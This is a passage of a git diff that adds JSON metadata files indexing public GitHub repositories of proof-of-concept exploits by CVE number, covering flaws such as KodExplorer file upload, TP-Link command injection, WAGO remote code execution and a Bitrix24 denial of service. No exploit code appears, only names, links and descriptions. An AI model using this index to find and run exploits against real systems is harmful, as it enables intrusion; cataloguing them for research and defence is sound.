+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-4896.json b/2022/CVE-2022-4896.json
new file mode 100644
index 0000000000..159740af62
--- /dev/null
+++ b/2022/CVE-2022-4896.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 629992953,
+ "name": "CVE-2022-4896",
+ "full_name": "sapellaniz\/CVE-2022-4896",
+ "owner": {
+ "login": "sapellaniz",
+ "id": 60947777,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60947777?v=4",
+ "html_url": "https:\/\/github.com\/sapellaniz"
+ },
+ "html_url": "https:\/\/github.com\/sapellaniz\/CVE-2022-4896",
+ "description": "CVE-2022-4896 PoCs & exploits ",
+ "fork": false,
+ "created_at": "2023-04-19T12:53:03Z",
+ "updated_at": "2023-04-19T12:55:00Z",
+ "pushed_at": "2023-04-19T12:54:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-4939.json b/2022/CVE-2022-4939.json
new file mode 100644
index 0000000000..5dd912561e
--- /dev/null
+++ b/2022/CVE-2022-4939.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 624443836,
+ "name": "PoC-CVE-2022-4939-",
+ "full_name": "BaconCriCRi\/PoC-CVE-2022-4939-",
+ "owner": {
+ "login": "BaconCriCRi",
+ "id": 130064933,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130064933?v=4",
+ "html_url": "https:\/\/github.com\/BaconCriCRi"
+ },
+ "html_url": "https:\/\/github.com\/BaconCriCRi\/PoC-CVE-2022-4939-",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-06T13:34:09Z",
+ "updated_at": "2023-04-06T13:37:46Z",
+ "pushed_at": "2023-04-06T13:50:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-4944.json b/2022/CVE-2022-4944.json
new file mode 100644
index 0000000000..f27c453d30
--- /dev/null
+++ b/2022/CVE-2022-4944.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 630962699,
+ "name": "CVE-2022-4944",
+ "full_name": "MrEmpy\/CVE-2022-4944",
+ "owner": {
+ "login": "MrEmpy",
+ "id": 71796063,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71796063?v=4",
+ "html_url": "https:\/\/github.com\/MrEmpy"
+ },
+ "html_url": "https:\/\/github.com\/MrEmpy\/CVE-2022-4944",
+ "description": "「💥」CVE-2022-4944: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload",
+ "fork": false,
+ "created_at": "2023-04-21T15:09:37Z",
+ "updated_at": "2023-06-30T02:40:29Z",
+ "pushed_at": "2023-04-21T16:28:23Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-0099.json b/2023/CVE-2023-0099.json
new file mode 100644
index 0000000000..72c6ca3b82
--- /dev/null
+++ b/2023/CVE-2023-0099.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693003626,
+ "name": "CVE-2023-0099-exploit",
+ "full_name": "amirzargham\/CVE-2023-0099-exploit",
+ "owner": {
+ "login": "amirzargham",
+ "id": 133110721,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133110721?v=4",
+ "html_url": "https:\/\/github.com\/amirzargham"
+ },
+ "html_url": "https:\/\/github.com\/amirzargham\/CVE-2023-0099-exploit",
+ "description": "simple urls < 115 - Reflected XSS",
+ "fork": false,
+ "created_at": "2023-09-18T06:44:44Z",
+ "updated_at": "2024-01-12T02:47:49Z",
+ "pushed_at": "2024-02-10T05:04:22Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-0156.json b/2023/CVE-2023-0156.json
new file mode 100644
index 0000000000..d7b0321c5a
--- /dev/null
+++ b/2023/CVE-2023-0156.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695786615,
+ "name": "CVE-2023-0156",
+ "full_name": "b0marek\/CVE-2023-0156",
+ "owner": {
+ "login": "b0marek",
+ "id": 144051679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4",
+ "html_url": "https:\/\/github.com\/b0marek"
+ },
+ "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-0156",
+ "description": "Repository for CVE-2023-0156 vulnerability. ",
+ "fork": false,
+ "created_at": "2023-09-24T08:10:31Z",
+ "updated_at": "2023-09-24T08:10:31Z",
+ "pushed_at": "2023-09-24T08:17:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-0157.json b/2023/CVE-2023-0157.json
new file mode 100644
index 0000000000..e7dbde06b6
--- /dev/null
+++ b/2023/CVE-2023-0157.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695788809,
+ "name": "CVE-2023-0157",
+ "full_name": "b0marek\/CVE-2023-0157",
+ "owner": {
+ "login": "b0marek",
+ "id": 144051679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4",
+ "html_url": "https:\/\/github.com\/b0marek"
+ },
+ "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-0157",
+ "description": "Repository for CVE-2023-0157 vulnerability. ",
+ "fork": false,
+ "created_at": "2023-09-24T08:20:30Z",
+ "updated_at": "2023-09-24T08:20:30Z",
+ "pushed_at": "2023-09-24T08:24:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-0159.json b/2023/CVE-2023-0159.json
new file mode 100644
index 0000000000..79c179c701
--- /dev/null
+++ b/2023/CVE-2023-0159.json
@@ -0,0 +1,41 @@
+[
+ {
+ "id": 690020929,
+ "name": "EVCer",
+ "full_name": "im-hanzou\/EVCer",
+ "owner": {
+ "login": "im-hanzou",
+ "id": 61415393,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4",
+ "html_url": "https:\/\/github.com\/im-hanzou"
+ },
+ "html_url": "https:\/\/github.com\/im-hanzou\/EVCer",
+ "description": "Automatic Mass Tool for checking vulnerability in CVE-2023-0159 - Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated LFI",
+ "fork": false,
+ "created_at": "2023-09-11T11:36:35Z",
+ "updated_at": "2023-09-23T08:46:32Z",
+ "pushed_at": "2023-09-11T12:18:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "automation",
+ "bash",
+ "checker",
+ "cve-2023-0159",
+ "exploit",
+ "wordpress",
+ "wordpress-plugin",
+ "wpbakery"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-0266.json b/2023/CVE-2023-0266.json
new file mode 100644
index 0000000000..e8f74cbe04
--- /dev/null
+++ b/2023/CVE-2023-0266.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 769797107,
+ "name": "claude_opus_cve_2023_0266",
+ "full_name": "SeanHeelan\/claude_opus_cve_2023_0266",
+ "owner": {
+ "login": "SeanHeelan",
+ "id": 1920339,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1920339?v=4",
+ "html_url": "https:\/\/github.com\/SeanHeelan"
+ },
+ "html_url": "https:\/\/github.com\/SeanHeelan\/claude_opus_cve_2023_0266",
+ "description": "Demo showing Claude Opus does not find CVE-2023-0266",
+ "fork": false,
+ "created_at": "2024-03-10T04:41:34Z",
+ "updated_at": "2024-05-20T22:14:44Z",
+ "pushed_at": "2024-03-19T14:18:20Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-0386.json b/2023/CVE-2023-0386.json
new file mode 100644
index 0000000000..59d15cab49
--- /dev/null
+++ b/2023/CVE-2023-0386.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 735013638,
+ "name": "CVE-2023-0386",
+ "full_name": "puckiestyle\/CVE-2023-0386",
+ "owner": {
+ "login": "puckiestyle",
+ "id": 57447087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4",
+ "html_url": "https:\/\/github.com\/puckiestyle"
+ },
+ "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2023-0386",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-23T11:01:55Z",
+ "updated_at": "2024-03-17T20:39:07Z",
+ "pushed_at": "2023-12-23T11:12:56Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 765025096,
+ "name": "CVE-2023-0386",
+ "full_name": "letsr00t\/CVE-2023-0386",
+ "owner": {
+ "login": "letsr00t",
+ "id": 38699989,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38699989?v=4",
+ "html_url": "https:\/\/github.com\/letsr00t"
+ },
+ "html_url": "https:\/\/github.com\/letsr00t\/CVE-2023-0386",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-29T06:22:50Z",
+ "updated_at": "2024-02-29T06:22:51Z",
+ "pushed_at": "2024-02-29T06:23:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 782345345,
+ "name": "CVE-2023-0386",
+ "full_name": "churamanib\/CVE-2023-0386",
+ "owner": {
+ "login": "churamanib",
+ "id": 155580704,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155580704?v=4",
+ "html_url": "https:\/\/github.com\/churamanib"
+ },
+ "html_url": "https:\/\/github.com\/churamanib\/CVE-2023-0386",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-05T05:47:00Z",
+ "updated_at": "2024-04-05T05:49:33Z",
+ "pushed_at": "2024-04-05T06:01:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 790464197,
+ "name": "CVE-2023-0386-libs",
+ "full_name": "EstamelGG\/CVE-2023-0386-libs",
+ "owner": {
+ "login": "EstamelGG",
+ "id": 46676047,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46676047?v=4",
+ "html_url": "https:\/\/github.com\/EstamelGG"
+ },
+ "html_url": "https:\/\/github.com\/EstamelGG\/CVE-2023-0386-libs",
+ "description": "CVE-2023-0386 包含所需运行库",
+ "fork": false,
+ "created_at": "2024-04-22T23:33:35Z",
+ "updated_at": "2024-04-23T12:53:20Z",
+ "pushed_at": "2024-04-23T12:53:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-0656.json b/2023/CVE-2023-0656.json
new file mode 100644
index 0000000000..eed45b2ce1
--- /dev/null
+++ b/2023/CVE-2023-0656.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 742585090,
+ "name": "CVE-2022-22274_CVE-2023-0656",
+ "full_name": "BishopFox\/CVE-2022-22274_CVE-2023-0656",
+ "owner": {
+ "login": "BishopFox",
+ "id": 4523757,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4523757?v=4",
+ "html_url": "https:\/\/github.com\/BishopFox"
+ },
+ "html_url": "https:\/\/github.com\/BishopFox\/CVE-2022-22274_CVE-2023-0656",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-12T20:03:51Z",
+ "updated_at": "2024-05-16T05:49:05Z",
+ "pushed_at": "2024-01-12T20:15:47Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-08.json b/2023/CVE-2023-08.json
new file mode 100644
index 0000000000..2185404874
--- /dev/null
+++ b/2023/CVE-2023-08.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 690906596,
+ "name": "CVE-2023-08-21-exploit",
+ "full_name": "amirzargham\/CVE-2023-08-21-exploit",
+ "owner": {
+ "login": "amirzargham",
+ "id": 133110721,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133110721?v=4",
+ "html_url": "https:\/\/github.com\/amirzargham"
+ },
+ "html_url": "https:\/\/github.com\/amirzargham\/CVE-2023-08-21-exploit",
+ "description": "Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS",
+ "fork": false,
+ "created_at": "2023-09-13T05:59:02Z",
+ "updated_at": "2023-09-24T07:34:00Z",
+ "pushed_at": "2024-02-10T05:04:31Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-1177.json b/2023/CVE-2023-1177.json
new file mode 100644
index 0000000000..920382a537
--- /dev/null
+++ b/2023/CVE-2023-1177.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 669753010,
+ "name": "CVE-2023-1177-MLFlow",
+ "full_name": "iumiro\/CVE-2023-1177-MLFlow",
+ "owner": {
+ "login": "iumiro",
+ "id": 100076479,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100076479?v=4",
+ "html_url": "https:\/\/github.com\/iumiro"
+ },
+ "html_url": "https:\/\/github.com\/iumiro\/CVE-2023-1177-MLFlow",
+ "description": "CVE for 2023",
+ "fork": false,
+ "created_at": "2023-07-23T10:12:27Z",
+ "updated_at": "2023-08-03T10:17:43Z",
+ "pushed_at": "2023-08-03T10:10:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 721284951,
+ "name": "CVE-2023-1177-rebuild",
+ "full_name": "tiyeume25112004\/CVE-2023-1177-rebuild",
+ "owner": {
+ "login": "tiyeume25112004",
+ "id": 77606941,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77606941?v=4",
+ "html_url": "https:\/\/github.com\/tiyeume25112004"
+ },
+ "html_url": "https:\/\/github.com\/tiyeume25112004\/CVE-2023-1177-rebuild",
+ "description": "Learn more things, not suck all things",
+ "fork": false,
+ "created_at": "2023-11-20T18:32:46Z",
+ "updated_at": "2023-11-20T18:37:25Z",
+ "pushed_at": "2023-11-20T18:36:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-1326.json b/2023/CVE-2023-1326.json
new file mode 100644
index 0000000000..784c9311b2
--- /dev/null
+++ b/2023/CVE-2023-1326.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 727965226,
+ "name": "CVE-2023-1326-PoC",
+ "full_name": "diego-tella\/CVE-2023-1326-PoC",
+ "owner": {
+ "login": "diego-tella",
+ "id": 70545257,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70545257?v=4",
+ "html_url": "https:\/\/github.com\/diego-tella"
+ },
+ "html_url": "https:\/\/github.com\/diego-tella\/CVE-2023-1326-PoC",
+ "description": "A proof of concept for CVE-2023–1326 in apport-cli 2.26.0",
+ "fork": false,
+ "created_at": "2023-12-06T00:07:40Z",
+ "updated_at": "2024-04-23T12:44:54Z",
+ "pushed_at": "2023-12-06T12:46:08Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 743946606,
+ "name": "CVE-2023-1326",
+ "full_name": "Pol-Ruiz\/CVE-2023-1326",
+ "owner": {
+ "login": "Pol-Ruiz",
+ "id": 151052652,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151052652?v=4",
+ "html_url": "https:\/\/github.com\/Pol-Ruiz"
+ },
+ "html_url": "https:\/\/github.com\/Pol-Ruiz\/CVE-2023-1326",
+ "description": "Esto es una prueba de concepto propia i basica de la vulneravilidad CVE-2023-1326",
+ "fork": false,
+ "created_at": "2024-01-16T10:20:53Z",
+ "updated_at": "2024-01-16T10:20:53Z",
+ "pushed_at": "2024-01-26T13:55:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 796053569,
+ "name": "CVE-2023-1326",
+ "full_name": "c0d3cr4f73r\/CVE-2023-1326",
+ "owner": {
+ "login": "c0d3cr4f73r",
+ "id": 66146701,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4",
+ "html_url": "https:\/\/github.com\/c0d3cr4f73r"
+ },
+ "html_url": "https:\/\/github.com\/c0d3cr4f73r\/CVE-2023-1326",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-04T19:47:58Z",
+ "updated_at": "2024-05-05T02:19:49Z",
+ "pushed_at": "2024-05-04T19:56:21Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815018186,
+ "name": "CVE-2023-1326-PoC",
+ "full_name": "cve-2024\/CVE-2023-1326-PoC",
+ "owner": {
+ "login": "cve-2024",
+ "id": 172750025,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4",
+ "html_url": "https:\/\/github.com\/cve-2024"
+ },
+ "html_url": "https:\/\/github.com\/cve-2024\/CVE-2023-1326-PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-14T07:15:50Z",
+ "updated_at": "2024-06-14T07:18:15Z",
+ "pushed_at": "2024-06-14T07:18:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-1389.json b/2023/CVE-2023-1389.json
new file mode 100644
index 0000000000..cc35ac11d8
--- /dev/null
+++ b/2023/CVE-2023-1389.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 671741059,
+ "name": "CVE-2023-1389",
+ "full_name": "Voyag3r-Security\/CVE-2023-1389",
+ "owner": {
+ "login": "Voyag3r-Security",
+ "id": 140756583,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140756583?v=4",
+ "html_url": "https:\/\/github.com\/Voyag3r-Security"
+ },
+ "html_url": "https:\/\/github.com\/Voyag3r-Security\/CVE-2023-1389",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-28T03:09:00Z",
+ "updated_at": "2024-05-30T20:38:05Z",
+ "pushed_at": "2023-08-09T01:37:19Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 689374873,
+ "name": "CVE-2023-1389",
+ "full_name": "Terminal1337\/CVE-2023-1389",
+ "owner": {
+ "login": "Terminal1337",
+ "id": 95563109,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95563109?v=4",
+ "html_url": "https:\/\/github.com\/Terminal1337"
+ },
+ "html_url": "https:\/\/github.com\/Terminal1337\/CVE-2023-1389",
+ "description": "TP-Link Archer AX21 - Unauthenticated Command Injection [Loader]",
+ "fork": false,
+ "created_at": "2023-09-09T15:53:22Z",
+ "updated_at": "2024-06-09T09:56:08Z",
+ "pushed_at": "2023-09-09T15:58:39Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-1454.json b/2023/CVE-2023-1454.json
new file mode 100644
index 0000000000..af7949f95c
--- /dev/null
+++ b/2023/CVE-2023-1454.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 737472483,
+ "name": "CVE-2023-1454-EXP",
+ "full_name": "shad0w0sec\/CVE-2023-1454-EXP",
+ "owner": {
+ "login": "shad0w0sec",
+ "id": 73059812,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73059812?v=4",
+ "html_url": "https:\/\/github.com\/shad0w0sec"
+ },
+ "html_url": "https:\/\/github.com\/shad0w0sec\/CVE-2023-1454-EXP",
+ "description": "JeecgBoot SQL(CVE-2023-1454)sqlmap 注入不出来的情况可以使用该脚本",
+ "fork": false,
+ "created_at": "2023-12-31T06:47:01Z",
+ "updated_at": "2024-01-10T08:10:37Z",
+ "pushed_at": "2024-01-10T08:09:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-1698.json b/2023/CVE-2023-1698.json
new file mode 100644
index 0000000000..596e370ea9
--- /dev/null
+++ b/2023/CVE-2023-1698.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 692207494,
+ "name": "CVE-2023-1698",
+ "full_name": "Chocapikk\/CVE-2023-1698",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-1698",
+ "description": "WAGO Remote Exploit Tool for CVE-2023-1698",
+ "fork": false,
+ "created_at": "2023-09-15T20:06:31Z",
+ "updated_at": "2023-12-19T11:39:47Z",
+ "pushed_at": "2023-09-15T20:07:07Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 707534264,
+ "name": "CVE-2023-1698",
+ "full_name": "deIndra\/CVE-2023-1698",
+ "owner": {
+ "login": "deIndra",
+ "id": 73511417,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73511417?v=4",
+ "html_url": "https:\/\/github.com\/deIndra"
+ },
+ "html_url": "https:\/\/github.com\/deIndra\/CVE-2023-1698",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-20T05:40:32Z",
+ "updated_at": "2023-10-20T05:44:30Z",
+ "pushed_at": "2023-10-20T05:44:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 707675736,
+ "name": "WAGO-CVE-2023-1698",
+ "full_name": "thedarknessdied\/WAGO-CVE-2023-1698",
+ "owner": {
+ "login": "thedarknessdied",
+ "id": 56123966,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56123966?v=4",
+ "html_url": "https:\/\/github.com\/thedarknessdied"
+ },
+ "html_url": "https:\/\/github.com\/thedarknessdied\/WAGO-CVE-2023-1698",
+ "description": "WAGO系统远程代码执行漏洞(CVE-2023-1698)",
+ "fork": false,
+ "created_at": "2023-10-20T12:15:39Z",
+ "updated_at": "2023-11-17T06:55:48Z",
+ "pushed_at": "2023-10-20T12:55:17Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-1718.json b/2023/CVE-2023-1718.json
new file mode 100644
index 0000000000..d4dc01e041
--- /dev/null
+++ b/2023/CVE-2023-1718.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 715967658,
+ "name": "Bitrix24DoS",
+ "full_name": "jhonnybonny\/Bitrix24DoS",
+ "owner": {
+ "login": "jhonnybonny",
+ "id": 87495218,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87495218?v=4",
+ "html_url": "https:\/\/github.com\/jhonnybonny"
+ },
+ "html_url": "https:\/\/github.com\/jhonnybonny\/Bitrix24DoS",
+ "description": "This Python script is designed to exploit a security vulnerability in Bitrix24, leading to a Denial of Service (DoS) attack. The vulnerability, identified as CVE-2023-1718, allows an attacker to disrupt the normal operation of a Bitrix24 instance.",
+ "fork": false,
+ "created_at": "2023-11-08T07:45:54Z",
+ "updated_at": "2024-03-25T03:34:53Z",
+ "pushed_at": "2023-11-08T07:51:53Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
